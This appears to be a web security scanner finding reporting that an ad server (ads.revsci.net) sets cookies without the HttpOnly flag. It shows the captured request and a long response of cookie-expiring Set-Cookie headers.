Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=I07714 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_96sc=MLuBu6yht4kWQAcYCwq3qtH/Je30l0vQIMllZLMTR5d1cXDbc3eX0XFkPieoml1m03ilSbH+UDzM8ahhkwNRJIjsQekY9SHhEfoErML/TD+1N5BDdk6/B/CvX3bhGLQ3s1uvTJFu6bmlGXFRddc7Q88DyqOsfDVBczaNqEk18Dy7B57guB8dm9vx5I0cfvoTdC2UdNz5S6FBXbz04N3YbbmMXAQ6Wt+0OLHhHUU7KFucwXqAEdNCXxVHVGOHllgcS6HqmtQ1oHhumx0AWg==; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; rsiPus_Dp_w="MLtXrlEusS9roBD3MlioxsCF6sySUVfem3F3zgv5P2X5MNBz5u04Ie9ppXXLTNPCB8Rrdx21qWPBSMqTbO6HYwOXUoBWKm6QOeSxGzfdhIMqVpPipkbUdAcWiVJ3Cs4I2Yz+rbqR1Q7yacm6q3MhEYBqZRDVrlm4AttvllcDwygEvV4iEIdzZhutP2QInp8og4OZ+W7c9zRxnI1sZ/yaqTmrtGc5HBE/XipCAr9aBtIFqw2goGxwgKUjJ3So+TW+W8qspjGdsu4/t7OLlio5pcMR2nwhP2uILD3LHj7kAvztOgnn3xZhVKkQvKI+Vg=="; rsi_us_1000000="...[SNIP]..."; rsi_segs_1000000=pUPFeknF7gMYF1JYvJuXopO09a420jnOKLfHaVwoHNgwnmKsDTMJ3YH2aKvvUGIZ/ovnvZQpXcibMPPd7DErWPCzXoGmdIFqM4kSkqVY4gx2tb55vuBU6xY7+voByvYres1JgvnVBK1tOVdIEKTEh5zeeSJ3c6azfwNbivbJs+KlZnQ2c6UCUEdoIjrmao/eYXYcDa0NTi8RdBX3aGM8/aQQvvQ=; udm_0=...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Dp_w=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gdim=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LRgg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-Jfi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bTBF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bEm6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VfeO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_YqeU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5Dgt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_PHh7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_R5ta=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_sB-Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LIlC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_rEo0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LVUM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ig3D=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5dcS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dZVt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nZdO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jrA8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-EDR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LfdY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_w3Ik=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2hxF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_s6i9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qpw9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9q7G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X_m0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-vTc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zi3a=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_EVuz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hG-O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3uh_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ed-o=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DgP-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IyHz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9wJ3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3AjH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OeQh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oJJI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IKnw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_FRRz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Z-ZL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BlDK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Uce7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hYlJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tvYV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_N2Wc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Xwgv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NpBx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_7yN0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5ytn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_R0nn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jHB4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Tbod=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dJ-5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tZle=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tAk2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2wEa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GcnD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dTlc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RcWU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mv19=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nBsJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cIpx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qQG7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TK1Q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ebC_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0lxQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_W97N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-cAf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_fEAy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DcHG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-kXI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mvhC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jgOQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_sECh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BUMx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_aOWp=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nXqC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DJxo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_m2_A=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_M0jo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_I-qW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_PC0B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OcGH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lpX7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_x85Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Y4G3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DxQf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_WxUe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qxKk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DMxV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_irVm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9NFF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lc2G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Vs1Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zrkg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BAU5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6_lC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nHxo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_R12Q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_AFG2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DAxJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OiN2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_22wc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9z65=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cWvO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6AGk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X5fA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xCLB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VeZQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GdYU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Nuyz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9LuU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8hPO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__hgI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zCmS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zB78=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3cxz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0Svs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tIki=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VmnB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VnuE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jU0b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_FnTH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8VJk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gN5g=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NGZ6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ykIF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lvxT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ru6l=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_fsx9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mjM4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TAJT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_K27G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_E_cj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-r_t=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_c9Qy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_okZc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_f9hD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_piZk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_amP2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jzux=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_S261=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_U-lS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GRM2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ru44=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_05qP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_WUD5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_37Ra=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pdjm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wQ9i=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TgmM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_F1aA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wtKf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qaRA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jxPB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_AOct=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Hvpv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_umeK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Bqao=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zXe7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mcS7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nSV0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dXYl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_r5h4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_YGYS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uOdh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_t8un=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_UhXN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Yggs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tFKi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dMCl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jUrT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_HPp6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3Us7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_UTqe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NyfH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_C1HA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hCo4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5uBS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mAGT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RObH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uEcy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xCvN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ebxh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_j_e_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9mAa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-4qM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_fMbS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_AKta=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pXq4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_g7pa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zbII=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GEDh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_MRmN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5uiD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
